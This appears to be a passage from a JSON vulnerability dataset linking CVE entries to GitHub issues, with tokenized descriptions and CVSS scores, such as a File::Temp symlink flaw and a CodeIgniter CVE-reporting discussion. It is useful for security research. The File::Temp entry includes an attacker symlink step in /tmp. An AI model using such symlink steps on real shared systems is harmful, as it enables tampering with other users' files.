179831808318183182831838318483185831868318783188831898319083191831928319383194831958319683197831988319983200832018320283203832048320583206832078320883209832108321183212832138321483215832168321783218832198322083221832228322383224832258322683227832288322983230832318323283233832348323583236832378323883239832408324183242832438324483245832468324783248832498325083251832528325383254832558325683257832588325983260832618326283263832648326583266832678326883269832708327183272832738327483275832768327783278832798328083281832828328383284832858328683287832888328983290832918329283293832948329583296832978329883299833008330183302833038330483305833068330783308833098331083311833128331383314833158331683317833188331983320833218332283323833248332583326833278332883329833308333183332833338333483335833368333783338833398334083341833428334383344833458334683347833488334983350833518335283353833548335583356833578335883359833608336183362833638336483365833668336783368833698337083371833728337383374833758337683377833788337983380833818338283383833848338583386833878338883389833908339183392833938339483395833968339783398833998340083401834028340383404834058340683407834088340983410834118341283413834148341583416834178341883419834208342183422834238342483425834268342783428834298343083431834328343383434834358343683437834388343983440834418344283443834448344583446834478344883449834508345183452834538345483455834568345783458834598346083461834628346383464834658346683467834688346983470834718347283473834748347583476834778347883479834808348183482834838348483485834868348783488834898349083491834928349383494834958349683497834988349983500835018350283503835048350583506835078350883509835108351183512835138351483515835168351783518835198352083521835228352383524835258352683527835288352983530835318353283533835348353583536835378353883539835408354183542835438354483545835468354783548835498355083551835528355383554835558355683557835588355983560835618356283563835648356583566835678356883569835708357183572835738357483575835768357783578835798358083581835828358383584835858358683587835888358983590835918359283593835948359583596835978359883599836008360183602836038360483605836068360783608836098361083611836128361383614836158361683617836188361983620836218362283623836248362583626836278362883629836308363183632836338363483635836368363783638836398364083641836428364383644836458364683647836488364983650836518365283653836548365583656836578365883659836608366183662836638366483665836668366783668836698367083671836728367383674836758367683677836788367983680836818368283683836848368583686836878368883689836908369183692836938369483695836968369783698836998370083701837028370383704837058370683707837088370983710837118371283713837148371583716837178371883719837208372183722837238372483725837268372783728837298373083731837328373383734837358373683737837388373983740837418374283743837448374583746837478374883749837508375183752837538375483755837568375783758837598376083761837628376383764837658376683767837688376983770837718377283773837748377583776837778377883779837808378183782837838378483785837868378783788837898379083791837928379383794837958379683797837988379983800838018380283803838048380583806838078380883809838108381183812838138381483815838168381783818838198382083821838228382383824838258382683827838288382983830838318383283833838348383583836838378383883839838408384183842838438384483845838468384783848838498385083851838528385383854838558385683857838588385983860838618386283863838648386583866838678386883869838708387183872838738387483875838768387783878838798388083881838828388383884838858388683887838888388983890838918389283893838948389583896838978389883899839008390183902839038390483905839068390783908839098391083911839128391383914839158391683917839188391983920839218392283923839248392583926839278392883929839308393183932839338393483935839368393783938839398394083941839428394383944839458394683947839488394983950839518395283953839548395583956839578395883959839608396183962839638396483965839668396783968839698397083971839728397383974839758397683977839788397983980839818398283983839848398583986839878398883989839908399183992839938399483995839968399783998839998400084001840028400384004840058400684007840088400984010840118401284013840148401584016840178401884019840208402184022840238402484025840268402784028840298403084031840328403384034840358403684037840388403984040840418404284043840448404584046840478404884049840508405184052840538405484055840568405784058840598406084061840628406384064840658406684067840688406984070840718407284073840748407584076840778407884079840808408184082840838408484085840868408784088840898409084091840928409384094840958409684097840988409984100841018410284103841048410584106841078410884109841108411184112841138411484115841168411784118841198412084121841228412384124841258412684127841288412984130841318413284133841348413584136841378413884139841408414184142841438414484145841468414784148841498415084151841528415384154841558415684157841588415984160841618416284163841648416584166841678416884169841708417184172841738417484175841768417784178841798418084181841828418384184841858418684187841888418984190841918419284193841948419584196841978419884199842008420184202842038420484205842068420784208842098421084211842128421384214842158421684217842188421984220842218422284223842248422584226842278422884229842308423184232842338423484235842368423784238842398424084241842428424384244842458424684247842488424984250842518425284253842548425584256842578425884259842608426184262842638426484265842668426784268842698427084271842728427384274842758427684277842788427984280842818428284283842848428584286842878428884289842908429184292842938429484295842968429784298842998430084301843028430384304843058430684307843088430984310843118431284313843148431584316843178431884319843208432184322843238432484325843268432784328843298433084331843328433384334843358433684337843388433984340843418434284343843448434584346843478434884349843508435184352843538435484355843568435784358843598436084361843628436384364843658436684367843688436984370843718437284373843748437584376843778437884379843808438184382843838438484385843868438784388843898439084391843928439384394843958439684397843988439984400844018440284403844048440584406844078440884409844108441184412844138441484415844168441784418844198442084421844228442384424844258442684427844288442984430844318443284433844348443584436844378443884439844408444184442844438444484445844468444784448844498445084451844528445384454844558445684457844588445984460844618446284463844648446584466844678446884469844708447184472844738447484475844768447784478844798448084481844828448384484844858448684487844888448984490844918449284493844948449584496844978449884499845008450184502845038450484505845068450784508845098451084511845128451384514845158451684517845188451984520845218452284523845248452584526845278452884529845308453184532845338453484535845368453784538845398454084541845428454384544845458454684547845488454984550845518455284553845548455584556845578455884559845608456184562845638456484565845668456784568845698457084571845728457384574845758457684577845788457984580845818458284583845848458584586845878458884589845908459184592845938459484595845968459784598845998460084601846028460384604846058460684607846088460984610846118461284613846148461584616846178461884619846208462184622846238462484625846268462784628846298463084631846328463384634846358463684637846388463984640846418464284643846448464584646846478464884649846508465184652846538465484655846568465784658846598466084661846628466384664846658466684667846688466984670846718467284673846748467584676846778467884679846808468184682846838468484685846868468784688846898469084691846928469384694846958469684697846988469984700847018470284703847048470584706847078470884709847108471184712847138471484715847168471784718847198472084721847228472384724847258472684727847288472984730847318473284733847348473584736847378473884739847408474184742847438474484745847468474784748847498475084751847528475384754847558475684757847588475984760847618476284763847648476584766847678476884769847708477184772847738477484775847768477784778847798478084781847828478384784847858478684787847888478984790847918479284793847948479584796847978479884799848008480184802848038480484805848068480784808848098481084811848128481384814848158481684817848188481984820848218482284823848248482584826848278482884829848308483184832848338483484835848368483784838848398484084841848428484384844848458484684847848488484984850848518485284853848548485584856848578485884859848608486184862848638486484865848668486784868848698487084871848728487384874848758487684877848788487984880848818488284883848848488584886848878488884889848908489184892848938489484895848968489784898848998490084901849028490384904849058490684907849088490984910849118491284913849148491584916849178491884919849208492184922849238492484925849268492784928849298493084931849328493384934849358493684937849388493984940849418494284943849448494584946849478494884949849508495184952849538495484955849568495784958849598496084961849628496384964849658496684967849688496984970849718497284973849748497584976849778497884979849808498184982849838498484985849868498784988849898499084991849928499384994849958499684997849988499985000850018500285003850048500585006850078500885009850108501185012850138501485015850168501785018850198502085021850228502385024850258502685027850288502985030850318503285033850348503585036850378503885039850408504185042850438504485045850468504785048850498505085051850528505385054850558505685057850588505985060850618506285063850648506585066850678506885069850708507185072850738507485075850768507785078850798508085081850828508385084850858508685087850888508985090850918509285093850948509585096850978509885099851008510185102851038510485105851068510785108851098511085111851128511385114851158511685117851188511985120851218512285123851248512585126851278512885129851308513185132851338513485135851368513785138851398514085141851428514385144851458514685147851488514985150851518515285153851548515585156851578515885159851608516185162851638516485165851668516785168851698517085171851728517385174851758517685177851788517985180851818518285183851848518585186851878518885189851908519185192851938519485195851968519785198851998520085201852028520385204852058520685207852088520985210852118521285213852148521585216852178521885219852208522185222852238522485225852268522785228852298523085231852328523385234852358523685237852388523985240852418524285243852448524585246852478524885249852508525185252852538525485255852568525785258852598526085261852628526385264852658526685267852688526985270852718527285273852748527585276852778527885279852808528185282852838528485285852868528785288852898529085291852928529385294852958529685297852988529985300853018530285303853048530585306853078530885309853108531185312853138531485315853168531785318853198532085321853228532385324853258532685327853288532985330853318533285333853348533585336853378533885339853408534185342853438534485345853468534785348853498535085351853528535385354853558535685357853588535985360853618536285363853648536585366853678536885369853708537185372853738537485375853768537785378853798538085381853828538385384853858538685387853888538985390853918539285393853948539585396853978539885399854008540185402854038540485405854068540785408854098541085411854128541385414854158541685417854188541985420854218542285423854248542585426854278542885429854308543185432854338543485435854368543785438854398544085441854428544385444854458544685447854488544985450854518545285453854548545585456854578545885459854608546185462854638546485465854668546785468854698547085471854728547385474854758547685477854788547985480854818548285483854848548585486854878548885489854908549185492854938549485495854968549785498854998550085501855028550385504855058550685507855088550985510855118551285513855148551585516855178551885519855208552185522855238552485525855268552785528855298553085531855328553385534855358553685537855388553985540855418554285543855448554585546855478554885549855508555185552855538555485555855568555785558855598556085561855628556385564855658556685567855688556985570855718557285573855748557585576855778557885579855808558185582855838558485585855868558785588855898559085591855928559385594855958559685597855988559985600856018560285603856048560585606856078560885609856108561185612856138561485615856168561785618856198562085621856228562385624856258562685627856288562985630856318563285633856348563585636856378563885639856408564185642856438564485645856468564785648856498565085651856528565385654856558565685657856588565985660856618566285663856648566585666856678566885669856708567185672856738567485675856768567785678856798568085681856828568385684856858568685687856888568985690856918569285693856948569585696856978569885699857008570185702857038570485705857068570785708857098571085711857128571385714857158571685717857188571985720857218572285723857248572585726857278572885729857308573185732857338573485735857368573785738857398574085741857428574385744857458574685747857488574985750857518575285753857548575585756857578575885759857608576185762857638576485765857668576785768857698577085771857728577385774857758577685777857788577985780857818578285783857848578585786857878578885789857908579185792857938579485795857968579785798857998580085801858028580385804858058580685807858088580985810858118581285813858148581585816858178581885819858208582185822858238582485825858268582785828858298583085831858328583385834858358583685837858388583985840858418584285843858448584585846858478584885849858508585185852858538585485855858568585785858858598586085861858628586385864858658586685867858688586985870858718587285873858748587585876858778587885879858808588185882858838588485885858868588785888858898589085891858928589385894858958589685897858988589985900859018590285903859048590585906859078590885909859108591185912859138591485915859168591785918859198592085921859228592385924859258592685927859288592985930859318593285933859348593585936859378593885939859408594185942859438594485945859468594785948859498595085951859528595385954859558595685957859588595985960859618596285963859648596585966859678596885969859708597185972859738597485975859768597785978859798598085981859828598385984859858598685987859888598985990859918599285993859948599585996859978599885999860008600186002860038600486005860068600786008860098601086011860128601386014860158601686017860188601986020860218602286023860248602586026860278602886029860308603186032860338603486035860368603786038860398604086041860428604386044860458604686047860488604986050860518605286053860548605586056860578605886059860608606186062860638606486065860668606786068860698607086071860728607386074860758607686077860788607986080860818608286083860848608586086860878608886089860908609186092860938609486095860968609786098860998610086101861028610386104861058610686107861088610986110861118611286113861148611586116861178611886119861208612186122861238612486125861268612786128861298613086131861328613386134861358613686137861388613986140861418614286143861448614586146861478614886149861508615186152861538615486155861568615786158861598616086161861628616386164861658616686167861688616986170861718617286173861748617586176861778617886179861808618186182861838618486185861868618786188861898619086191861928619386194861958619686197861988619986200862018620286203862048620586206862078620886209862108621186212862138621486215862168621786218862198622086221862228622386224862258622686227862288622986230862318623286233862348623586236862378623886239862408624186242862438624486245862468624786248862498625086251862528625386254862558625686257862588625986260862618626286263862648626586266862678626886269862708627186272862738627486275862768627786278862798628086281862828628386284862858628686287862888628986290862918629286293862948629586296862978629886299863008630186302863038630486305863068630786308863098631086311863128631386314863158631686317863188631986320863218632286323863248632586326863278632886329863308633186332863338633486335863368633786338863398634086341863428634386344863458634686347863488634986350863518635286353863548635586356863578635886359863608636186362863638636486365863668636786368863698637086371863728637386374863758637686377863788637986380863818638286383863848638586386863878638886389863908639186392863938639486395863968639786398863998640086401864028640386404864058640686407864088640986410864118641286413864148641586416864178641886419864208642186422864238642486425864268642786428864298643086431864328643386434864358643686437864388643986440864418644286443864448644586446864478644886449864508645186452864538645486455864568645786458864598646086461864628646386464864658646686467864688646986470864718647286473864748647586476864778647886479864808648186482864838648486485864868648786488864898649086491864928649386494864958649686497864988649986500865018650286503865048650586506865078650886509865108651186512865138651486515865168651786518865198652086521865228652386524865258652686527865288652986530865318653286533865348653586536865378653886539865408654186542865438654486545865468654786548865498655086551865528655386554865558655686557865588655986560865618656286563865648656586566865678656886569865708657186572865738657486575865768657786578865798658086581865828658386584865858658686587865888658986590865918659286593865948659586596865978659886599866008660186602866038660486605866068660786608866098661086611866128661386614866158661686617866188661986620866218662286623866248662586626866278662886629866308663186632866338663486635866368663786638866398664086641866428664386644866458664686647866488664986650866518665286653866548665586656866578665886659866608666186662866638666486665866668666786668866698667086671866728667386674866758667686677866788667986680866818668286683866848668586686866878668886689866908669186692866938669486695866968669786698866998670086701867028670386704867058670686707867088670986710867118671286713867148671586716867178671886719867208672186722867238672486725867268672786728867298673086731867328673386734867358673686737867388673986740867418674286743867448674586746867478674886749867508675186752867538675486755867568675786758867598676086761867628676386764867658676686767867688676986770867718677286773867748677586776867778677886779867808678186782867838678486785867868678786788867898679086791867928679386794867958679686797867988679986800868018680286803868048680586806868078680886809868108681186812868138681486815868168681786818868198682086821868228682386824868258682686827868288682986830868318683286833868348683586836868378683886839868408684186842868438684486845868468684786848868498685086851868528685386854868558685686857868588685986860868618686286863868648686586866868678686886869868708687186872868738687486875868768687786878868798688086881868828688386884868858688686887868888688986890868918689286893868948689586896868978689886899869008690186902869038690486905869068690786908869098691086911869128691386914869158691686917869188691986920869218692286923869248692586926869278692886929869308693186932869338693486935869368693786938869398694086941869428694386944869458694686947869488694986950869518695286953869548695586956869578695886959869608696186962869638696486965869668696786968869698697086971869728697386974869758697686977869788697986980869818698286983869848698586986869878698886989869908699186992869938699486995869968699786998869998700087001870028700387004870058700687007870088700987010870118701287013870148701587016870178701887019870208702187022870238702487025870268702787028870298703087031870328703387034870358703687037870388703987040870418704287043870448704587046870478704887049870508705187052870538705487055870568705787058870598706087061870628706387064870658706687067870688706987070870718707287073870748707587076870778707887079870808708187082870838708487085870868708787088870898709087091870928709387094870958709687097870988709987100871018710287103871048710587106871078710887109871108711187112871138711487115871168711787118871198712087121871228712387124871258712687127871288712987130871318713287133871348713587136871378713887139871408714187142871438714487145871468714787148871498715087151871528715387154871558715687157871588715987160871618716287163871648716587166871678716887169871708717187172871738717487175871768717787178871798718087181871828718387184871858718687187871888718987190871918719287193871948719587196871978719887199872008720187202872038720487205872068720787208872098721087211872128721387214872158721687217872188721987220872218722287223872248722587226872278722887229872308723187232872338723487235872368723787238872398724087241872428724387244872458724687247872488724987250872518725287253872548725587256872578725887259872608726187262872638726487265872668726787268872698727087271872728727387274872758727687277872788727987280872818728287283872848728587286872878728887289872908729187292872938729487295872968729787298872998730087301873028730387304873058730687307873088730987310873118731287313873148731587316873178731887319873208732187322873238732487325873268732787328873298733087331873328733387334873358733687337873388733987340873418734287343873448734587346873478734887349873508735187352873538735487355873568735787358873598736087361873628736387364873658736687367873688736987370873718737287373873748737587376873778737887379873808738187382873838738487385873868738787388873898739087391873928739387394873958739687397873988739987400874018740287403874048740587406874078740887409874108741187412874138741487415874168741787418874198742087421874228742387424874258742687427874288742987430874318743287433874348743587436874378743887439874408744187442874438744487445874468744787448874498745087451874528745387454874558745687457874588745987460874618746287463874648746587466874678746887469874708747187472874738747487475874768747787478874798748087481874828748387484874858748687487874888748987490874918749287493874948749587496874978749887499875008750187502875038750487505875068750787508875098751087511875128751387514875158751687517875188751987520875218752287523875248752587526875278752887529875308753187532875338753487535875368753787538875398754087541875428754387544875458754687547875488754987550875518755287553875548755587556875578755887559875608756187562875638756487565875668756787568875698757087571875728757387574875758757687577875788757987580875818758287583875848758587586875878758887589875908759187592875938759487595875968759787598875998760087601876028760387604876058760687607876088760987610876118761287613876148761587616876178761887619876208762187622876238762487625876268762787628876298763087631876328763387634876358763687637876388763987640876418764287643876448764587646876478764887649876508765187652876538765487655876568765787658876598766087661876628766387664876658766687667876688766987670876718767287673876748767587676876778767887679876808768187682876838768487685876868768787688876898769087691876928769387694876958769687697876988769987700877018770287703877048770587706877078770887709877108771187712877138771487715877168771787718877198772087721877228772387724877258772687727877288772987730877318773287733877348773587736877378773887739877408774187742877438774487745877468774787748877498775087751877528775387754877558775687757877588775987760877618776287763877648776587766877678776887769877708777187772877738777487775877768777787778877798778087781877828778387784877858778687787877888778987790877918779287793877948779587796877978779887799878008780187802878038780487805878068780787808878098781087811878128781387814878158781687817878188781987820878218782287823878248782587826878278782887829878308783187832878338783487835878368783787838878398784087841878428784387844878458784687847878488784987850878518785287853878548785587856878578785887859878608786187862878638786487865878668786787868878698787087871878728787387874878758787687877878788787987880878818788287883878848788587886878878788887889878908789187892878938789487895878968789787898878998790087901879028790387904879058790687907879088790987910879118791287913879148791587916879178791887919879208792187922879238792487925879268792787928879298793087931879328793387934879358793687937879388793987940879418794287943879448794587946879478794887949879508795187952879538795487955879568795787958879598796087961879628796387964879658796687967879688796987970879718797287973879748797587976879778797887979879808798187982879838798487985879868798787988879898799087991879928799387994879958799687997879988799988000880018800288003880048800588006880078800888009880108801188012880138801488015880168801788018880198802088021880228802388024880258802688027880288802988030880318803288033880348803588036880378803888039880408804188042880438804488045880468804788048880498805088051880528805388054880558805688057880588805988060880618806288063880648806588066880678806888069880708807188072880738807488075880768807788078880798808088081880828808388084880858808688087880888808988090880918809288093880948809588096880978809888099881008810188102881038810488105881068810788108881098811088111881128811388114881158811688117881188811988120881218812288123881248812588126881278812888129881308813188132881338813488135881368813788138881398814088141881428814388144881458814688147881488814988150881518815288153881548815588156881578815888159881608816188162881638816488165881668816788168881698817088171881728817388174881758817688177881788817988180881818818288183881848818588186881878818888189881908819188192881938819488195881968819788198881998820088201882028820388204882058820688207882088820988210882118821288213882148821588216882178821888219882208822188222882238822488225882268822788228882298823088231882328823388234882358823688237882388823988240882418824288243882448824588246882478824888249882508825188252882538825488255882568825788258882598826088261882628826388264882658826688267882688826988270882718827288273882748827588276882778827888279882808828188282882838828488285882868828788288882898829088291882928829388294882958829688297882988829988300883018830288303883048830588306883078830888309883108831188312883138831488315883168831788318883198832088321883228832388324883258832688327883288832988330883318833288333883348833588336883378833888339883408834188342883438834488345883468834788348883498835088351883528835388354883558835688357883588835988360883618836288363883648836588366883678836888369883708837188372883738837488375883768837788378883798838088381883828838388384883858838688387883888838988390883918839288393883948839588396883978839888399884008840188402884038840488405884068840788408884098841088411884128841388414884158841688417884188841988420884218842288423884248842588426884278842888429884308843188432884338843488435884368843788438884398844088441884428844388444884458844688447884488844988450884518845288453884548845588456884578845888459884608846188462884638846488465884668846788468884698847088471884728847388474884758847688477884788847988480884818848288483884848848588486884878848888489884908849188492884938849488495884968849788498884998850088501885028850388504885058850688507885088850988510885118851288513885148851588516885178851888519885208852188522885238852488525885268852788528885298853088531885328853388534885358853688537885388853988540885418854288543885448854588546885478854888549885508855188552885538855488555885568855788558885598856088561885628856388564885658856688567885688856988570885718857288573885748857588576885778857888579885808858188582885838858488585885868858788588885898859088591885928859388594885958859688597885988859988600886018860288603886048860588606886078860888609886108861188612886138861488615886168861788618886198862088621886228862388624886258862688627886288862988630886318863288633886348863588636886378863888639886408864188642886438864488645886468864788648886498865088651886528865388654886558865688657886588865988660886618866288663886648866588666886678866888669886708867188672886738867488675886768867788678886798868088681886828868388684886858868688687886888868988690886918869288693886948869588696886978869888699887008870188702887038870488705887068870788708887098871088711887128871388714887158871688717887188871988720887218872288723887248872588726887278872888729887308873188732887338873488735887368873788738887398874088741887428874388744887458874688747887488874988750887518875288753887548875588756887578875888759887608876188762887638876488765887668876788768887698877088771887728877388774887758877688777887788877988780887818878288783887848878588786887878878888789887908879188792887938879488795887968879788798887998880088801888028880388804888058880688807888088880988810888118881288813888148881588816888178881888819888208882188822888238882488825888268882788828888298883088831888328883388834888358883688837888388883988840888418884288843888448884588846888478884888849888508885188852888538885488855888568885788858888598886088861888628886388864888658886688867888688886988870888718887288873888748887588876888778887888879888808888188882888838888488885888868888788888888898889088891888928889388894888958889688897888988889988900889018890288903889048890588906889078890888909889108891188912889138891488915889168891788918889198892088921889228892388924889258892688927889288892988930889318893288933889348893588936889378893888939889408894188942889438894488945889468894788948889498895088951889528895388954889558895688957889588895988960889618896288963889648896588966889678896888969889708897188972889738897488975889768897788978889798898088981889828898388984889858898688987889888898988990889918899288993889948899588996889978899888999890008900189002890038900489005890068900789008890098901089011890128901389014890158901689017890188901989020890218902289023890248902589026890278902889029890308903189032890338903489035890368903789038890398904089041890428904389044890458904689047890488904989050890518905289053890548905589056890578905889059890608906189062890638906489065890668906789068890698907089071890728907389074890758907689077890788907989080890818908289083890848908589086890878908889089890908909189092890938909489095890968909789098890998910089101891028910389104891058910689107891088910989110891118911289113891148911589116891178911889119891208912189122891238912489125891268912789128891298913089131891328913389134891358913689137891388913989140891418914289143891448914589146891478914889149891508915189152891538915489155891568915789158891598916089161891628916389164891658916689167891688916989170891718917289173891748917589176891778917889179891808918189182891838918489185891868918789188891898919089191891928919389194891958919689197891988919989200892018920289203892048920589206892078920889209892108921189212892138921489215892168921789218892198922089221892228922389224892258922689227892288922989230892318923289233892348923589236892378923889239892408924189242892438924489245892468924789248892498925089251892528925389254892558925689257892588925989260892618926289263892648926589266892678926889269892708927189272892738927489275892768927789278892798928089281892828928389284892858928689287892888928989290892918929289293892948929589296892978929889299893008930189302893038930489305893068930789308893098931089311893128931389314893158931689317893188931989320893218932289323893248932589326893278932889329893308933189332893338933489335893368933789338893398934089341893428934389344893458934689347893488934989350893518935289353893548935589356893578935889359893608936189362893638936489365893668936789368893698937089371893728937389374893758937689377893788937989380893818938289383893848938589386893878938889389893908939189392893938939489395893968939789398893998940089401894028940389404894058940689407894088940989410894118941289413894148941589416894178941889419894208942189422894238942489425894268942789428894298943089431894328943389434894358943689437894388943989440894418944289443894448944589446894478944889449894508945189452894538945489455894568945789458894598946089461894628946389464894658946689467894688946989470894718947289473894748947589476894778947889479894808948189482894838948489485894868948789488894898949089491894928949389494894958949689497894988949989500895018950289503895048950589506895078950889509895108951189512895138951489515895168951789518895198952089521895228952389524895258952689527895288952989530895318953289533895348953589536895378953889539895408954189542895438954489545895468954789548895498955089551895528955389554895558955689557895588955989560895618956289563895648956589566895678956889569895708957189572895738957489575895768957789578895798958089581895828958389584895858958689587895888958989590895918959289593895948959589596895978959889599896008960189602896038960489605896068960789608896098961089611896128961389614896158961689617896188961989620896218962289623896248962589626896278962889629896308963189632896338963489635896368963789638896398964089641896428964389644896458964689647896488964989650896518965289653896548965589656896578965889659896608966189662896638966489665896668966789668896698967089671896728967389674896758967689677896788967989680896818968289683896848968589686896878968889689896908969189692896938969489695896968969789698896998970089701897028970389704897058970689707897088970989710897118971289713897148971589716897178971889719897208972189722897238972489725897268972789728897298973089731897328973389734897358973689737897388973989740897418974289743897448974589746897478974889749897508975189752897538975489755897568975789758897598976089761897628976389764897658976689767897688976989770897718977289773897748977589776897778977889779897808978189782897838978489785897868978789788897898979089791897928979389794897958979689797897988979989800898018980289803898048980589806898078980889809898108981189812898138981489815898168981789818898198982089821898228982389824898258982689827898288982989830898318983289833898348983589836898378983889839898408984189842898438984489845898468984789848898498985089851898528985389854898558985689857898588985989860898618986289863898648986589866898678986889869898708987189872898738987489875898768987789878898798988089881898828988389884898858988689887898888988989890898918989289893898948989589896898978989889899899008990189902899038990489905899068990789908899098991089911899128991389914899158991689917899188991989920899218992289923899248992589926899278992889929899308993189932899338993489935899368993789938899398994089941899428994389944899458994689947899488994989950899518995289953899548995589956899578995889959899608996189962899638996489965899668996789968899698997089971899728997389974899758997689977899788997989980899818998289983899848998589986899878998889989899908999189992899938999489995899968999789998899999000090001900029000390004900059000690007900089000990010900119001290013900149001590016900179001890019900209002190022900239002490025900269002790028900299003090031900329003390034900359003690037900389003990040900419004290043900449004590046900479004890049900509005190052900539005490055900569005790058900599006090061900629006390064900659006690067900689006990070900719007290073900749007590076900779007890079900809008190082900839008490085900869008790088900899009090091900929009390094900959009690097900989009990100901019010290103901049010590106901079010890109901109011190112901139011490115901169011790118901199012090121901229012390124901259012690127901289012990130901319013290133901349013590136901379013890139901409014190142901439014490145901469014790148901499015090151901529015390154901559015690157901589015990160901619016290163901649016590166901679016890169901709017190172901739017490175901769017790178901799018090181901829018390184901859018690187901889018990190901919019290193901949019590196901979019890199902009020190202902039020490205902069020790208902099021090211902129021390214902159021690217902189021990220902219022290223902249022590226902279022890229902309023190232902339023490235902369023790238902399024090241902429024390244902459024690247902489024990250902519025290253902549025590256902579025890259902609026190262902639026490265902669026790268902699027090271902729027390274902759027690277902789027990280902819028290283902849028590286902879028890289902909029190292902939029490295902969029790298902999030090301903029030390304903059030690307903089030990310903119031290313903149031590316903179031890319903209032190322903239032490325903269032790328903299033090331903329033390334903359033690337903389033990340903419034290343903449034590346903479034890349903509035190352903539035490355903569035790358903599036090361903629036390364903659036690367903689036990370903719037290373903749037590376903779037890379903809038190382903839038490385903869038790388903899039090391903929039390394903959039690397903989039990400904019040290403904049040590406904079040890409904109041190412904139041490415904169041790418904199042090421904229042390424904259042690427904289042990430904319043290433904349043590436904379043890439904409044190442904439044490445904469044790448904499045090451904529045390454904559045690457904589045990460904619046290463904649046590466904679046890469904709047190472904739047490475904769047790478904799048090481904829048390484904859048690487904889048990490904919049290493904949049590496904979049890499905009050190502905039050490505905069050790508905099051090511905129051390514905159051690517905189051990520905219052290523905249052590526905279052890529905309053190532905339053490535905369053790538905399054090541905429054390544905459054690547905489054990550905519055290553905549055590556905579055890559905609056190562905639056490565905669056790568905699057090571905729057390574905759057690577905789057990580905819058290583905849058590586905879058890589905909059190592905939059490595905969059790598905999060090601906029060390604906059060690607906089060990610906119061290613906149061590616906179061890619906209062190622906239062490625906269062790628906299063090631906329063390634906359063690637906389063990640906419064290643906449064590646906479064890649906509065190652906539065490655906569065790658906599066090661906629066390664906659066690667906689066990670906719067290673906749067590676906779067890679906809068190682906839068490685906869068790688906899069090691906929069390694906959069690697906989069990700907019070290703907049070590706907079070890709907109071190712907139071490715907169071790718907199072090721907229072390724907259072690727907289072990730907319073290733907349073590736907379073890739907409074190742907439074490745907469074790748907499075090751907529075390754907559075690757907589075990760907619076290763907649076590766907679076890769907709077190772907739077490775907769077790778907799078090781907829078390784907859078690787907889078990790907919079290793907949079590796907979079890799908009080190802908039080490805908069080790808908099081090811908129081390814908159081690817908189081990820908219082290823908249082590826908279082890829908309083190832908339083490835908369083790838908399084090841908429084390844908459084690847908489084990850908519085290853908549085590856908579085890859908609086190862908639086490865908669086790868908699087090871908729087390874908759087690877908789087990880908819088290883908849088590886908879088890889908909089190892908939089490895908969089790898908999090090901909029090390904909059090690907909089090990910909119091290913909149091590916909179091890919909209092190922909239092490925909269092790928909299093090931909329093390934909359093690937909389093990940909419094290943909449094590946909479094890949909509095190952909539095490955909569095790958909599096090961909629096390964909659096690967909689096990970909719097290973909749097590976909779097890979909809098190982909839098490985909869098790988909899099090991909929099390994909959099690997909989099991000910019100291003910049100591006910079100891009910109101191012910139101491015910169101791018910199102091021910229102391024910259102691027910289102991030910319103291033910349103591036910379103891039910409104191042910439104491045910469104791048910499105091051910529105391054910559105691057910589105991060910619106291063910649106591066910679106891069910709107191072910739107491075910769107791078910799108091081910829108391084910859108691087910889108991090910919109291093910949109591096910979109891099911009110191102911039110491105911069110791108911099111091111911129111391114911159111691117911189111991120911219112291123911249112591126911279112891129911309113191132911339113491135911369113791138911399114091141911429114391144911459114691147911489114991150911519115291153911549115591156911579115891159911609116191162911639116491165911669116791168911699117091171911729117391174911759117691177911789117991180911819118291183911849118591186911879118891189911909119191192911939119491195911969119791198911999120091201912029120391204912059120691207912089120991210912119121291213912149121591216912179121891219912209122191222912239122491225912269122791228912299123091231912329123391234912359123691237912389123991240912419124291243912449124591246912479124891249912509125191252912539125491255912569125791258912599126091261912629126391264912659126691267912689126991270912719127291273912749127591276912779127891279912809128191282912839128491285912869128791288912899129091291912929129391294912959129691297912989129991300913019130291303913049130591306913079130891309913109131191312913139131491315913169131791318913199132091321913229132391324913259132691327913289132991330913319133291333913349133591336913379133891339913409134191342913439134491345913469134791348913499135091351913529135391354913559135691357913589135991360913619136291363913649136591366913679136891369913709137191372913739137491375913769137791378913799138091381913829138391384913859138691387913889138991390913919139291393913949139591396913979139891399914009140191402914039140491405914069140791408914099141091411914129141391414914159141691417914189141991420914219142291423914249142591426914279142891429914309143191432914339143491435914369143791438914399144091441914429144391444914459144691447914489144991450914519145291453914549145591456914579145891459914609146191462914639146491465914669146791468914699147091471914729147391474914759147691477914789147991480914819148291483
  1. [
  2. {
  3. "CVE_ID": "CVE-2011-4116",
  4. "Issue_Url_old": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14",
  5. "Issue_Url_new": "https://github.com/perl-toolchain-gang/file-temp/issues/14",
  6. "Repo_new": "perl-toolchain-gang/file-temp",
  7. "Issue_Created_At": "2016-04-03T03:41:22Z",
  8. "description": "APITAG allows unsafe traversal of symlinks APITAG NUMBERTAG URLTAG Example... As user \"attacker\": ln s /tmp /tmp/exploit As user \"victim\": perl APITAG e APITAG APITAG print APITAG PATHTAG ) . \" \";' The temporary directory path that is returned includes the symlink owned by the \"attacker\" user.",
  9. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  10. "severity": "HIGH",
  11. "baseScore": 7.5,
  12. "impactScore": 3.6,
  13. "exploitabilityScore": 3.9
  14. },
  15. {
  16. "CVE_ID": "CVE-2013-4891",
  17. "Issue_Url_old": "https://github.com/bcit-ci/CodeIgniter/issues/4020",
  18. "Issue_Url_new": "https://github.com/bcit-ci/codeigniter/issues/4020",
  19. "Repo_new": "bcit-ci/codeigniter",
  20. "Issue_Created_At": "2015-08-04T08:48:37Z",
  21. "description": "APITAG security and CVE database. Hello APITAG developers, I noticed a few known security vulnerabilities (CVE numbers) that apply to the APITAG project (official CPE name APITAG For APITAG are four registered CVE reports: CVETAG CVETAG CVETAG CVETAG For APITAG is just one known security report: CVETAG . Source: FILETAG I read some CVE related posts and I noticed that the value of a CVE database is not always appreciated or understood. Source: URLTAG URLTAG Nevertheless I'm wondering why there are not more CVE's reported so far. I've been pretty active in following the APITAG development and noticed last years that some security bugs have been fixed but are never reported to the CVE database. I'm happy that APITAG is an open source project and like to contribute to that. Especially using some of my IT security expertise. For that reason I'd like to work out some CVE reports about different security bugs in previous versions that are currently fixed. This way there will be a clear and open view about the amount of security vulnerabilities per version and hopefully this will encourage the developers who didn't upgrade, to upgrade to the latest version of APITAG For people who are unfamiliar to this world. In comparison and as an example this are the CVE lists of some other PHP frameworks and APITAG Yii: FILETAG Zend: FILETAG Symfony: FILETAG APITAG FILETAG I'd like to hear some thoughts about this and especially I'm wondering if I should just work out some APITAG and just submit the bugs to the CVE database, or to discuss those bugs here before submitting them, just to make sure. Any thoughts? 